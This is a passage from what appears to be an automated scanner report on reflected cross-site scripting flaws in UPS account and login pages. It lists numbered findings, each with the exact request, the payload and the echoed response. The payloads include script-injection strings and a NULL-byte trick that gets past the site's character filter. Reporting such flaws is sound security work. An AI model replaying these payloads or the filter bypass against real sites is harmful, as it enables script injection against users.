Date: Mon, 14 Feb 2011 01:26:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_e96d0</script><script>alert(1)</script>eeee4ba8d58';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_e96d0</script>
...[SNIP]...

1.120. https://www.ups.com/account/am/start [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %004ec10'-alert(1)-'cf7523a708f was submitted in the loc parameter. This input was echoed as 4ec10'-alert(1)-'cf7523a708f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /account/am/start?loc=en_US%004ec10'-alert(1)-'cf7523a708f&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
1)-'cf7523a708f';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_4ec10'-alert(1)-'cf7523a708f';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_4ec10'-alert(1)-'cf7523a708f';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.121. https://www.ups.com/account/am/start [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0056fb2"><script>alert(1)</script>5e2077907d2 was submitted in the loc parameter. This input was echoed as 56fb2"><script>alert(1)</script>5e2077907d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /account/am/start?loc=en_US%0056fb2"><script>alert(1)</script>5e2077907d2&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_56fb2"><script>alert(1)</script>5e2077907d2&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_56fb2%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B5e2077907d2%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.122. https://www.ups.com/account/us/start [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 1c510%0a5bec88f7632 was submitted in the REST URL parameter 2. This input was echoed as 1c510
5bec88f7632
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/us1c510%0a5bec88f7632/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:34 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40728


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/us1c510
5bec88f7632
/start?appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/a
...[SNIP]...

1.123. https://www.ups.com/account/us/start [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57780'%3bbaf8e0aa31b was submitted in the REST URL parameter 2. This input was echoed as 57780';baf8e0aa31b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/us57780'%3bbaf8e0aa31b/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40742


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
pid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/us57780';baf8e0aa31b/start?appid=OPENACCT';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/us57780';baf8e0aa31b/start?appid=OPENACCT';
actionUr
...[SNIP]...

1.124. https://www.ups.com/account/us/start [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44722"%20a%3db%20d499cf7b97a was submitted in the REST URL parameter 2. This input was echoed as 44722" a=b d499cf7b97a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us44722"%20a%3db%20d499cf7b97a/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40815


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/us44722" a=b d499cf7b97a/start?appid=OPENACCT">
...[SNIP]...

1.125. https://www.ups.com/account/us/start [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript rest-of-line comment. The payload b76c7%0a1e4ac2a860 was submitted in the REST URL parameter 3. This input was echoed as b76c7
1e4ac2a860
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/us/startb76c7%0a1e4ac2a860 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40718


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/us/startb76c7
1e4ac2a860
?appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account
...[SNIP]...

1.126. https://www.ups.com/account/us/start [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8dd7"%20a%3db%20a3fcf1e4a73 was submitted in the REST URL parameter 3. This input was echoed as a8dd7" a=b a3fcf1e4a73 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/starta8dd7"%20a%3db%20a3fcf1e4a73 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40815


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/us/starta8dd7" a=b a3fcf1e4a73?appid=OPENACCT">
...[SNIP]...

1.127. https://www.ups.com/account/us/start [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ead4'%3be1cc69c801d was submitted in the REST URL parameter 3. This input was echoed as 2ead4';e1cc69c801d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/us/start2ead4'%3be1cc69c801d HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40742


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
ENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/us/start2ead4';e1cc69c801d?appid=OPENACCT';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/us/start2ead4';e1cc69c801d?appid=OPENACCT';
actionUrl = "/
...[SNIP]...

1.128. https://www.ups.com/account/us/start [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b6c8d"><script>alert(1)</script>62dcb8e5408 was submitted in the loc parameter. This input was echoed as b6c8d"><script>alert(1)</script>62dcb8e5408 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /account/us/start?loc=en_US%00b6c8d"><script>alert(1)</script>62dcb8e5408&WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:10 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11232


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_b6c8d"><script>alert(1)</script>62dcb8e5408&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_b6c8d%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B62dcb8e5408%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.129. https://www.ups.com/account/us/start [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00a5b57'-alert(1)-'baf778aa453 was submitted in the loc parameter. This input was echoed as a5b57'-alert(1)-'baf778aa453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /account/us/start?loc=en_US%00a5b57'-alert(1)-'baf778aa453&WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10656


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
&appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_a5b57'-alert(1)-'baf778aa453&appid=OPENACCT';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_a5b57'-alert(1)-'baf778aa453&appid=OPENACCT';
actionUrl = "
...[SNIP]...

1.130. https://www.ups.com/account/us/start [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %004d539</script><script>alert(1)</script>a033567d25f was submitted in the loc parameter. This input was echoed as 4d539</script><script>alert(1)</script>a033567d25f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /account/us/start?loc=en_US%004d539</script><script>alert(1)</script>a033567d25f&WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11332


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_4d539</script><script>alert(1)</script>a033567d25f&appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_
...[SNIP]...

1.131. https://www.ups.com/cva [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 33597%0a293e9fe1556 was submitted in the REST URL parameter 1. This input was echoed as 33597
293e9fe1556
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cva33597%0a293e9fe1556 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44320


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d = "";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/cva33597
293e9fe1556
?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/cva33597
293
...[SNIP]...

1.132. https://www.ups.com/cva [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6b82'%3bf7a06e554b0 was submitted in the REST URL parameter 1. This input was echoed as e6b82';f7a06e554b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cvae6b82'%3bf7a06e554b0 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44337


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
a06e554b0?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/cvae6b82';f7a06e554b0?appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/cvae6b82';f7a06e554b0?appid=CVA';
actionUrl = "/one-to-one/login?ID=100
...[SNIP]...

1.133. https://www.ups.com/cva [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940e5"%20a%3db%2097335661a92 was submitted in the REST URL parameter 1. This input was echoed as 940e5" a=b 97335661a92 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

